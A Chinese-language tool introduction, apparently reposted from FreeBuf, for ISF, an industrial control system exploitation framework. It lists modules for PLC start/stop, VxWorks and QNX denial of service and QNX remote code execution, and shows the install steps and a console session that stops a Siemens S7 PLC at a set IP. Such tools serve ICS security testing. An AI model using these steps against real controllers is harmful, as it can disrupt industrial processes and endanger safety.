内容简介:ISF:一款基于Python的工控系统漏洞利用框架
今天给大家介绍一款名叫ISF的工具,它是一款针对工业控制系统的漏洞利用框架。该 工具 基于开源项目routersploit,采用 Python 语言开发,它跟MetaSploit框架有些相似,希望大家能够喜欢。
ICS(工业控制系统)协议客户端
| 名称 | 路径 | Description |
| modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | Modbus-TCP 客户端 |
| wdb2_client | icssploit/clients/wdb2_client.py | WdbRPC Version 2 客户端 (Vxworks 6.x) |
| s7_client | icssploit/clients/s7_client.py | s7comm 客户端 (S7 300/400 PLC) |
漏洞利用模块
| Name | Path | Description |
| s7_300_400_plc_control | exploits/plcs/siemens/s7_300_400_plc_control.py | S7-300/400 PLC 启动/停止 |
| vxworks_rpc_dos | exploits/plcs/vxworks/vxworks_rpc_dos.py | Vxworks RPC 远程DoS( CVE-2015-7599 ) |
| quantum_140_plc_control | exploits/plcs/schneider/quantum_140_plc_control.py | Schneider Quantum 140 系列 PLC启动/停止 |
| crash_qnx_inetd_tcp_service | exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py | Crash QNX Inetd TCP服务 |
| qconn_remote_exec | exploits/plcs/qnx/qconn_remote_exec.py | QNX QCONN 远程代码执行 |
扫描器模块
| Name | Path | Description |
| profinet-dcp-scan | scanners/profinet-dcp-scan.py | Profinet DCP 扫描器 |
| vxworks_6_scan | scanners/vxworks_6_scan.py | Vxworks 6.x 扫描器 |
| s7comm_scan | scanners/s7comm_scan.py | S7comm 扫描器 |
ICS协议模块(采用Scapy编写)
这些协议模块能够与其他的模糊测试框架(例如Kitty)进行整合,或者你也可以将其用于开发属于你自己的客户端工具。
| Name | Path | Description |
| pn_dcp | icssploit/protocols/pn_dcp | Profinet DCP Protocol |
| modbus_tcp | icssploit/protocols/modbus_tcp | Modbus TCP Protocol |
| wdbrpc2 | icssploit/protocols/wdbrpc2 | WDB RPC Version 2 Protocol |
| s7comm | icssploit/protocols/s7comm.py | S7comm Protocol |
框架安装
Python依赖环境
gnureadline(OSX only) requests paramiko beautifulsoup4 pysnmp python-nmap scapy
在Kali Linux中安装
安装命令如下所示:
git clone https://github.com/dark-lbp/isf/ cd isf python isf.py
工具使用
root@kali:~/Desktop/temp/isf#python isf.py
_____ _____ _____ _____ _____ _ ____ _____ _______
|_ _/ ____|/ ____/ ____| __ \|| / __ \_ _|__ __|
| || | | (___| (___ | |__) | | | | | || | | |
| || | \___ \\___ \| ___/| | | | | || | | |
_| || |____ ____) |___) | | | |___| |__| || |_ | |
|_____\_____|_____/_____/|_| |______\____/_____| |_|
ICS Exploitation Framework
Note : ICSSPOLIT is fork from routersploit at
https://github.com/reverse-shell/routersploit
Dev Team : wenzhe zhu(dark-lbp)
Version : 0.1.0
Exploits: 2 Scanners: 0 Creds: 13
ICS Exploits:
PLC: 2 ICS Switch: 0
Software: 0
isf >
漏洞利用
isf> use exploits/plcs/ exploits/plcs/siemens/ exploits/plcs/vxworks/ isf> use exploits/plcs/siemens/s7_300_400_plc_control exploits/plcs/siemens/s7_300_400_plc_control isf> use exploits/plcs/siemens/s7_300_400_plc_control isf(S7-300/400 PLC Control) >
注意事项:用户可使用Tab键实现命令补全。
选项
显示模块选项:
isf(S7-300/400 PLC Control) > show options Targetoptions: Name Current settings Description ---- ---------------- ----------- target Target address e.g.192.168.1.1 port 102 Target Port Moduleoptions: Name Current settings Description ---- ---------------- ----------- slot 2 CPU slotnumber. command 1 Command0:start plc, 1:stop plc. isf(S7-300/400 PLC Control) >
设置选项:
isf(S7-300/400 PLC Control) > set target 192.168.70.210
[+]{'target': '192.168.70.210'}
执行模块:
isf(S7-300/400 PLC Control) > run [*]Running module... [+]Target is alive [*]Sending packet to target [*]Stop plc isf(S7-300/400 PLC Control) >
显示模块信息:
isf(S7-300/400 PLC Control) > show info Name: S7-300/400PLC Control Description: UseS7comm command to start/stop plc. Devices: - Siemens S7-300 and S7-400 programmable logiccontrollers (PLCs) Authors: - wenzhe zhu <jtrkid[at]gmail.com> References: isf(S7-300/400 PLC Control) >
工具文档
3. S7 客户端工具使用说明
10. 如何创建一个 module
* 参考来源: lastline ,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
- 【FreeBuf字幕组】Web安全漏洞系列:Electron框架漏洞
- Play框架任意文件读取漏洞
- 漏洞预警丨某通用交易所框架组合型严重漏洞
- Web框架下安全漏洞的测试反思
- PHP框架Lavarel被发现存在高危漏洞
- ATtiny85漏洞利用框架HID测试分析
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
The Smashing Book
Jacob Gube、Dmitry Fadeev、Chris Spooner、Darius A Monsef IV、Alessandro Cattaneo、Steven Snell、David Leggett、Andrew Maier、Kayla Knight、Yves Peters、René Schmidt、Smashing Magazine editorial team、Vitaly Friedman、Sven Lennartz / 2009 / $ 29.90 / € 23.90
The Smashing Book is a printed book about best practices in modern Web design. The book shares technical tips and best practices on coding, usability and optimization and explores how to create succes......一起来看看 《The Smashing Book》 这本书的介绍吧!
